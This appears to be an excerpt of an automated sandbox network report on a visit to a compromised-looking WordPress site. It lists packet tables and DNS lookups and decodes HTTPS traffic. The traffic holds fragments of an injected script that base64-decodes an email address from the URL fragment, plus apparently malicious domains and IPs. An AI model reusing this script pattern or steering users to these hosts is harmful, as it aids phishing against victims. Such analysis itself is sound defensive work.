Jan 13, 2025 15:28:55.285079956 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.285089016 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.285098076 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.285101891 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.285136938 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.285154104 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.285968065 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.286031961 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.286823034 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.286849976 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.286881924 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.286886930 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.286922932 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.286925077 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:55.286968946 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.287245989 CET	49734	443	192.168.2.16	111.90.140.57
Jan 13, 2025 15:28:55.287257910 CET	443	49734	111.90.140.57	192.168.2.16
Jan 13, 2025 15:28:57.071934938 CET	49698	80	192.168.2.16	199.232.210.172
Jan 13, 2025 15:28:57.072024107 CET	49699	80	192.168.2.16	199.232.210.172
Jan 13, 2025 15:28:57.078027964 CET	80	49698	199.232.210.172	192.168.2.16
Jan 13, 2025 15:28:57.078048944 CET	80	49699	199.232.210.172	192.168.2.16
Jan 13, 2025 15:28:57.078119993 CET	49698	80	192.168.2.16	199.232.210.172
Jan 13, 2025 15:28:57.078134060 CET	49699	80	192.168.2.16	199.232.210.172
Jan 13, 2025 15:28:58.680845976 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:28:58.680883884 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:29:14.549371004 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:29:14.549518108 CET	443	49713	111.90.140.55	192.168.2.16
Jan 13, 2025 15:29:14.549606085 CET	49713	443	192.168.2.16	111.90.140.55
Jan 13, 2025 15:29:15.205020905 CET	49737	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:29:15.205051899 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:15.206257105 CET	49737	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:29:15.206257105 CET	49737	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:29:15.206281900 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:15.870104074 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:15.870445967 CET	49737	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:29:15.870465040 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:15.871627092 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:15.871901989 CET	49737	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:29:15.872080088 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:15.921821117 CET	49737	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:29:25.771718025 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:25.771864891 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:25.772068977 CET	49737	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:29:26.552596092 CET	49737	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:29:26.552613974 CET	443	49737	216.58.206.36	192.168.2.16
Jan 13, 2025 15:29:47.908023119 CET	49701	80	192.168.2.16	192.229.221.95
Jan 13, 2025 15:29:47.908023119 CET	49700	443	192.168.2.16	20.190.159.2
Jan 13, 2025 15:29:47.914455891 CET	443	49700	20.190.159.2	192.168.2.16
Jan 13, 2025 15:29:47.914479971 CET	80	49701	192.229.221.95	192.168.2.16
Jan 13, 2025 15:29:47.914525986 CET	49700	443	192.168.2.16	20.190.159.2
Jan 13, 2025 15:29:47.914562941 CET	49701	80	192.168.2.16	192.229.221.95
Jan 13, 2025 15:29:50.078121901 CET	49702	443	192.168.2.16	20.190.159.2
Jan 13, 2025 15:29:50.083199978 CET	443	49702	20.190.159.2	192.168.2.16
Jan 13, 2025 15:29:50.083273888 CET	49702	443	192.168.2.16	20.190.159.2
Jan 13, 2025 15:30:15.265111923 CET	49739	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:30:15.265141010 CET	443	49739	216.58.206.36	192.168.2.16
Jan 13, 2025 15:30:15.265355110 CET	49739	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:30:15.265628099 CET	49739	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:30:15.265640020 CET	443	49739	216.58.206.36	192.168.2.16
Jan 13, 2025 15:30:15.921319008 CET	443	49739	216.58.206.36	192.168.2.16
Jan 13, 2025 15:30:15.921638012 CET	49739	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:30:15.921649933 CET	443	49739	216.58.206.36	192.168.2.16
Jan 13, 2025 15:30:15.922738075 CET	443	49739	216.58.206.36	192.168.2.16
Jan 13, 2025 15:30:15.923029900 CET	49739	443	192.168.2.16	216.58.206.36
Jan 13, 2025 15:30:15.923206091 CET	443	49739	216.58.206.36	192.168.2.16
Jan 13, 2025 15:30:15.967849016 CET	49739	443	192.168.2.16	216.58.206.36

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 15:28:10.390386105 CET	53	49589	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:10.402249098 CET	53	51779	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:11.217917919 CET	61119	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:11.218094110 CET	61486	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:11.234147072 CET	53	61119	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:11.381257057 CET	53	61486	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:11.389255047 CET	53	59762	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:12.687242031 CET	60834	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:12.687547922 CET	51032	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:12.699460030 CET	53	51032	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:12.700104952 CET	53	60834	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:14.201610088 CET	64793	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:14.201802015 CET	56261	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:14.282617092 CET	53	64793	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:14.422614098 CET	53	56261	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:15.148159027 CET	60875	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:15.148258924 CET	63311	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:15.154864073 CET	53	63311	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:15.155544043 CET	53	60875	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:21.849208117 CET	56621	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:21.849340916 CET	59776	53	192.168.2.16	1.1.1.1
Jan 13, 2025 15:28:21.887245893 CET	53	59776	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:21.894884109 CET	53	56621	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:28.449212074 CET	53	53001	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:31.875850916 CET	53	63872	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:34.642322063 CET	53	50056	1.1.1.1	192.168.2.16
Jan 13, 2025 15:28:47.147404909 CET	53	59915	1.1.1.1	192.168.2.16
Jan 13, 2025 15:29:10.009577036 CET	53	65414	1.1.1.1	192.168.2.16
Jan 13, 2025 15:29:10.330815077 CET	53	56085	1.1.1.1	192.168.2.16
Jan 13, 2025 15:29:11.966059923 CET	138	138	192.168.2.16	192.168.2.255
Jan 13, 2025 15:29:39.801208019 CET	53	57694	1.1.1.1	192.168.2.16

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 13, 2025 15:28:11.381380081 CET	192.168.2.16	1.1.1.1	c28e	(Port unreachable)	Destination Unreachable
Jan 13, 2025 15:28:14.422724962 CET	192.168.2.16	1.1.1.1	c22e	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 15:28:11.217917919 CET	192.168.2.16	1.1.1.1	0xe7b5	Standard query (0)	chiltonconsultingllc.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:11.218094110 CET	192.168.2.16	1.1.1.1	0xf47b	Standard query (0)	chiltonconsultingllc.com	65	IN (0x0001)	false
Jan 13, 2025 15:28:12.687242031 CET	192.168.2.16	1.1.1.1	0x7a2b	Standard query (0)	opacks.online	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:12.687547922 CET	192.168.2.16	1.1.1.1	0xadde	Standard query (0)	opacks.online	65	IN (0x0001)	false
Jan 13, 2025 15:28:14.201610088 CET	192.168.2.16	1.1.1.1	0x1b63	Standard query (0)	www.ofiledr.icu	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:14.201802015 CET	192.168.2.16	1.1.1.1	0x2890	Standard query (0)	www.ofiledr.icu	65	IN (0x0001)	false
Jan 13, 2025 15:28:15.148159027 CET	192.168.2.16	1.1.1.1	0xe934	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:15.148258924 CET	192.168.2.16	1.1.1.1	0x7df4	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 13, 2025 15:28:21.849208117 CET	192.168.2.16	1.1.1.1	0xcdbe	Standard query (0)	www.ofiledr.icu	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:21.849340916 CET	192.168.2.16	1.1.1.1	0x323a	Standard query (0)	www.ofiledr.icu	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 15:28:11.234147072 CET	1.1.1.1	192.168.2.16	0xe7b5	No error (0)	chiltonconsultingllc.com	172.67.147.135	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:11.234147072 CET	1.1.1.1	192.168.2.16	0xe7b5	No error (0)	chiltonconsultingllc.com	104.21.28.200	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:11.381257057 CET	1.1.1.1	192.168.2.16	0xf47b	No error (0)	chiltonconsultingllc.com		65	IN (0x0001)	false
Jan 13, 2025 15:28:12.700104952 CET	1.1.1.1	192.168.2.16	0x7a2b	No error (0)	opacks.online	111.90.140.55	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:14.282617092 CET	1.1.1.1	192.168.2.16	0x1b63	No error (0)	www.ofiledr.icu	111.90.140.57	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:15.154864073 CET	1.1.1.1	192.168.2.16	0x7df4	No error (0)	www.google.com		65	IN (0x0001)	false
Jan 13, 2025 15:28:15.155544043 CET	1.1.1.1	192.168.2.16	0xe934	No error (0)	www.google.com	216.58.206.36	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:28:21.894884109 CET	1.1.1.1	192.168.2.16	0xcdbe	No error (0)	www.ofiledr.icu	111.90.140.57	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

chiltonconsultingllc.com

https:

opacks.online

www.ofiledr.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.16	49710	172.67.147.135	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:11 UTC	667	OUT	GET / HTTP/1.1 Host: chiltonconsultingllc.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-13 14:28:12 UTC	804	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0OzYUfaxMJB24EcsLrGQ319k%2F7R00PF41%2BZS04rHAb9GPnp%2F3c98Vo00zc5KAyE8C5k3ItCssWvWK2TNkxr39IewbJlISBnIYDBvTRUIjpjb5ZQ1ZEOheSZE4v%2FH0OBbCQN%2FCuMgxsw5I1k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90161245aa195e65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1640&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2863&recv_bytes=1245&delivery_rate=1745367&cwnd=243&unsent_bytes=0&cid=a1e2e5e85fd7a47b&ts=945&x=0"
2025-01-13 14:28:12 UTC	565	IN	Data Raw: 31 66 33 36 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 66 75 6e 63 74 69 6f 6e 20 76 61 6c 69 64 61 74 65 45 6d 61 69 6c 28 72 65 66 65 72 72 65 72 29 20 7b 0a 76 61 72 20 72 65 20 3d 20 2f 5e 28 28 5b 5e 3c 3e 28 29 5b 5c 5d 5c 2e 2c 3b 3a 5c 73 40 5c 22 5d 2b 28 5c 2e 5b 5e 3c 3e 28 29 5b 5c 5d 5c 2e 2c 3b 3a 5c 73 40 5c 22 5d 2b 29 2a 29 7c 28 5c 22 2e 2b 5c 22 29 29 40 28 28 5c 5b 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 5d 29 7c 28 28 5b 61 2d 7a 41 2d 5a 5c 2d 30 2d 39 5d 2b 5c 2e 29 2b 5b 61 2d 7a 41 2d 5a 5d 7b 32 2c 7d 29 29 24 2f 3b 0a 72 65 74 75 72 6e 20 72 65 2e 74 65 73 74 28 72 65 66 Data Ascii: 1f36<script type="text/javascript">function validateEmail(referrer) {var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)\|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])\|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;return re.test(ref
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 6c 3e 3d 38 29 7b 28 28 61 3d 28 62 3e 3e 3e 28 6c 2d 3d 38 29 29 26 30 78 66 66 29 7c 7c 28 78 3c 28 4c 2d 32 29 29 29 26 26 28 72 2b 3d 77 28 61 29 29 3b 7d 0a 20 20 20 20 20 7d 0a 20 20 20 20 20 72 65 74 75 72 6e 20 72 3b 0a 7d 0a 2f 2f 76 61 72 20 72 61 6d 70 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 76 61 72 20 68 61 73 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 76 61 72 20 65 6d 61 69 6c 20 3d 20 64 65 63 6f 64 65 42 61 73 65 36 34 28 68 61 73 68 29 3b 0a 76 61 72 20 65 6d 61 69 6c 36 34 20 3d 20 64 65 63 6f 64 65 42 61 73 65 36 34 28 68 61 73 68 29 3b 0a 76 61 72 20 65 6d 61 69 6c 32 20 3d 20 65 6d 61 69 Data Ascii: l>=8){((a=(b>>>(l-=8))&0xff)\|\|(x<(L-2)))&&(r+=w(a));} } return r;}//var ramp = window.location.hash.substring(1);var hash = window.location.hash.substring(1);var email = decodeBase64(hash);var email64 = decodeBase64(hash);var email2 = emai
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 68 69 6c 74 6f 6e 63 6f 6e 73 75 6c 74 69 6e 67 6c 6c 63 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 Data Ascii: aquo; Feed de los comentarios" href="https://chiltonconsultingllc.com/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 37 66 22 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e Data Ascii: 0\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElemen
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 Data Ascii: a),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 2d 70 72 65 Data Ascii: box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='text/css'>:root{--wp--pre
2025-01-13 14:28:12 UTC	588	IN	Data Raw: 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 Data Ascii: adient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gra
2025-01-13 14:28:12 UTC	158	IN	Data Raw: 39 38 0d 0a 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 34 2c 32 30 35 2c 31 36 35 29 20 30 25 2c 72 67 62 28 32 35 34 2c 34 35 2c 34 35 29 20 35 30 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 0d 0a Data Ascii: 98 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 33 66 39 32 0d 0a 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28 36 35 2c 38 38 2c 32 30 38 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 Data Ascii: 3f92p--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--p
2025-01-13 14:28:12 UTC	1369	IN	Data Raw: 69 76 29 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 3a 69 73 28 2a 2c 20 64 69 76 29 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a Data Ascii: iv){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.16	49711	172.67.147.135	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
